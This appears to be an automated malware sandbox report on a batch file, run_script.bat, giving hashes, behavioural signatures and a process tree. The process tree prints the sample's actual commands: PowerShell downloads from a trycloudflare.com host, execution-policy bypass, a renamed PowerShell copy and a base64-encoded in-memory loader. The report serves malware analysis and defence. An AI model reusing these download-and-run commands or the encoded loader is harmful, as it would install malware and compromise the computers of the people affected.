Analysis
-
max time kernel
94s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
13-11-2024 11:27
Static task
static1
Behavioral task
behavioral1
Sample
run_script.bat
Resource
win7-20240903-en
General
-
Target
run_script.bat
-
Size
8KB
-
MD5
2efffa15097ea8c880a10b0fea32054e
-
SHA1
f3e247d6aa4a2da2776a527e5ff7251576c1b260
-
SHA256
ddf7f8e12308ee481e883416af7cc1a19e7ce5feee7a69b3267f9d40480fe7b6
-
SHA512
caa107de8dd85690f576f01b69095f659465d6f7de8d079b06bb23dbf01c95e7e10d857535af2a523e42c8b6e775a8e819bb0413aa6a6b3c38c19f7ffcf88e76
-
SSDEEP
192:CincTy8G+hpQyuPmhDGEhtKCDw16/zbq/Z/+Hz6XlNnGwzA84q7YmvqMA0b:gTYcpQyuPmhDGEhtKCVa/k+vnGUA84yR
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4632 3392 cmd.exe 94 -
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeflow pid Process 8 4704 powershell.exe 18 1836 powershell.exe 19 700 powershell.exe 20 4500 powershell.exe 21 5052 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 4704 powershell.exe 1836 powershell.exe 700 powershell.exe 4500 powershell.exe 4704 powershell.exe 1836 powershell.exe 700 powershell.exe 4500 powershell.exe 5052 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation wscript.exe -
Executes dropped EXE 2 IoCs
Processes:
RunHiddenConsole.exereconstructed_script.vbs.exepid Process 1816 RunHiddenConsole.exe 3112 reconstructed_script.vbs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
reconstructed_script.vbs.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reconstructed_script.vbs.exe -
Modifies registry class 1 IoCs
Processes:
wscript.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ wscript.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exereconstructed_script.vbs.exepid Process 4704 powershell.exe 4704 powershell.exe 1836 powershell.exe 1836 powershell.exe 700 powershell.exe 700 powershell.exe 4500 powershell.exe 4500 powershell.exe 5052 powershell.exe 5052 powershell.exe 3112 reconstructed_script.vbs.exe 3112 reconstructed_script.vbs.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exereconstructed_script.vbs.exedescription pid Process Token: SeDebugPrivilege 4704 powershell.exe Token: SeDebugPrivilege 1836 powershell.exe Token: SeDebugPrivilege 700 powershell.exe Token: SeDebugPrivilege 4500 powershell.exe Token: SeDebugPrivilege 5052 powershell.exe Token: SeDebugPrivilege 3112 reconstructed_script.vbs.exe -
Suspicious use of WriteProcessMemory 17 IoCs
Processes:
cmd.exeRunHiddenConsole.exepowershell.exewscript.exedescription pid Process procid_target PID 1292 wrote to memory of 4704 1292 cmd.exe 84 PID 1292 wrote to memory of 4704 1292 cmd.exe 84 PID 1292 wrote to memory of 1836 1292 cmd.exe 88 PID 1292 wrote to memory of 1836 1292 cmd.exe 88 PID 1292 wrote to memory of 700 1292 cmd.exe 92 PID 1292 wrote to memory of 700 1292 cmd.exe 92 PID 1292 wrote to memory of 4500 1292 cmd.exe 95 PID 1292 wrote to memory of 4500 1292 cmd.exe 95 PID 1292 wrote to memory of 1816 1292 cmd.exe 96 PID 1292 wrote to memory of 1816 1292 cmd.exe 96 PID 1816 wrote to memory of 5052 1816 RunHiddenConsole.exe 97 PID 1816 wrote to memory of 5052 1816 RunHiddenConsole.exe 97 PID 5052 wrote to memory of 3544 5052 powershell.exe 108 PID 5052 wrote to memory of 3544 5052 powershell.exe 108 PID 3544 wrote to memory of 3112 3544 wscript.exe 111 PID 3544 wrote to memory of 3112 3544 wscript.exe 111 PID 3544 wrote to memory of 3112 3544 wscript.exe 111
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\run_script.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1292 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/RunHiddenConsole.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe'"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/RunHiddenConsole.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe'"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/download_and_run.ps1' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\download_and_run.ps1'"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/download_and_run.ps1' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\download_and_run.ps1'"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4500
-
-
C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe"C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe" powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\download_and_run.ps1"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1816 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\download_and_run.ps13⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs"4⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3544 -
C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs.exe"C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs.exe" -enc JABHAGwAYgBiAHcAZgBoAGkAZAB2AGEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATQB4AGQAZwB0AHIAagB1AGMAYwBjACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQARwBsAGIAYgB3AGYAaABpAGQAdgBhACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAFEAbABxAGkAaQBjAHIAdABvACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAE0AeABkAGcAdAByAGoAdQBjAGMAYwAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAVwBoAGoAbAB2AHQAYQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABRAGwAcQBpAGkAYwByAHQAbwAgACkAOwAkAE4AYgBtAHEAZwBrAGkAdgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQATABoAGQAaABoAGwAdgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABXAGgAagBsAHYAdABhAHQALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAEwAaABkAGgAaABsAHYALgBDAG8AcAB5AFQAbwAoACAAJABOAGIAbQBxAGcAawBpAHYAIAApADsAJABMAGgAZABoAGgAbAB2AC4AQwBsAG8AcwBlACgAKQA7ACQAVwBoAGoAbAB2AHQAYQB0AC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAUQBsAHEAaQBpAGMAcgB0AG8AIAA9ACAAJABOAGIAbQBxAGcAawBpAHYALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFEAbABxAGkAaQBjAHIAdABvACkAOwAgACQAUwBuAGEAdgBxAHgAdAB2ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAUQBsAHEAaQBpAGMAcgB0AG8AKQA7ACAAJABMAGsAaABvAHoAZABmAHEAcQB6AGsAIAA9ACAAJABTAG4AYQB2AHEAeAB0AHYALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABMAGsAaABvAHoAZABmAHEAcQB6AGsALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEwAawBoAG8AegBkAGYAcQBxAHoAawAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3112
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs.exe" /Y1⤵
- Process spawned unexpected child process
PID:4632
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
19KB
MD50ff0a78b0521dfc375c4d78525b8f265
SHA1c5d6bc71f293c137af7aad17f950cbc59da2abb8
SHA2565e5af018d697b29c49202462dfc0c41f4d46c340ca3a00cb987e55a6b04ad531
SHA5129740c28c5f09e2ebe5ef825dabe91af6868e0a0d612064cc1a43936f5d87d3452e35ce87d7f5a0887c142e53e04d1d8462744322a13577aff83d0b4f55171d70
-
Filesize
1KB
MD57ab00d2b8ad3a0a8426f6a535086b700
SHA15b912f4345328372093354ff2ba6a932fef4a8ab
SHA256cc27d1633ff5a4401c75569e6cd8f98e7ab09f01b8dfb0399f82efe197e0ca0c
SHA512839e5fbdcc406cee2f37a156ccbb772a80a0231508a7925f95e162990b31ea8366442fcd6073c9035905b47a34d60a3434cc776babf9d49521663b8d3e400584
-
Filesize
1KB
MD5d8356d1901292ab1c540c91fc5a566e1
SHA143f7ebcae8fd258f2e704dceea5d279e228469de
SHA25690af996df16e4574d32f3bd46cdedef8d4c8b2595accbb224b411320068bb7b9
SHA512e54b149b66a89a736aa9f626358077072941eb210e220e6fe4550be1d124b0c28d2c5c1726ce3ef45e38a280567df3235555773a84a2d1e1e463582c2c1a366e
-
Filesize
1KB
MD5a9725150c8400bf8023c6671a37eb561
SHA14cd6ddf574e66e050bcff972c4fa589a5681d489
SHA2564b732ad5f05c545c9b5dab1ede2a28a905420916e959adf134883472d6549849
SHA512add22f987e004d6a69be0e7f295ae9af797e3506755e32e11b6f01de8b2a551a28b174f0a04fb18afa671060638b533b7de944cd69056999e223cda6da91a45f
-
Filesize
1KB
MD5ecfad053723f0fcfa5277e7f671671ac
SHA15cae19229a7a728cc4906ef4d7dedf518922cbad
SHA25604b65887a9f0eefb8ec5b26bf1db84cd2296ca1a567c02ebaab1e3e8b660db6a
SHA512319840d9b514b3f43e79cf3fe18b87e3e3478eceed8a7c27253f4a864e43fda2c49231284219e86bd4975b61c971fc60856eed8f7314e398b88798feeef71554
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
32KB
MD5e897cfb1731bc4c02fbd563788ce1275
SHA174645248152ed5c29a80da620cb7d2707f5dc3c8
SHA2564ae7b909888f9609760754e021f4277680f915d8bd56207b9e589bf4314ebdaf
SHA5122f3249747a16d9c72bfcc4abc8e4bb49940350b38fec45971d2b6092299ca6ba8ebb8b12d92e67c0de33298dca3d977f5f1e4d83fb391bd09ffeda69b351647e
-
Filesize
3KB
MD5d3bdd166f49c5b37636eb5b6b4993a4c
SHA1b88e949bd3da41e95c53e4bacbeb80eebedf7c84
SHA25612828ef571dd470d640d01d43d6633ca26451363fbb051b229b1fcd607ffabd3
SHA5125b393fd5fa94ca832ef337aca23f446a3166526dd6dfd9c885b9995424cf37e0494de98ef3755cf3ea97dcf99b7cc6652f685396cfd2751b8d1837c06e19e304
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.7MB
MD584c74bd0c10be16a52e54848ffa7f34d
SHA12eec57a1371c9bfbf69c9bbb265cfe2371338cfc
SHA25630b571975bdf3155e07ce09bccac43f7dad05ed7ac8fba5de86d2d07dfd5bece
SHA5125c8deaf26c3af928b2d284affffdd60d95ee67998f97b46d4ca004d1d4fa86a64d586574eebb6274e3ed46e035cd02303df940d194ac0010dc4ae5da90a15e69
-
Filesize
500KB
MD5f1ca0c7256a310623187a8a12afc0d69
SHA16c8d587f756b9ecdfec1e4ac2fca23669fe54a55
SHA256fcfd5a286406b4b7890106cd0f477c54c82e33adad15da91e7c69ab58d671b3f
SHA512e947d90e1fde8118da7f807d52f9c9b3a013a84785c327ac311c481e25e2aaf986fafde3ad7ad80350e2085cad420ea0b9325b9e0e2c75e3843acea7ee1bad2d
-
Filesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc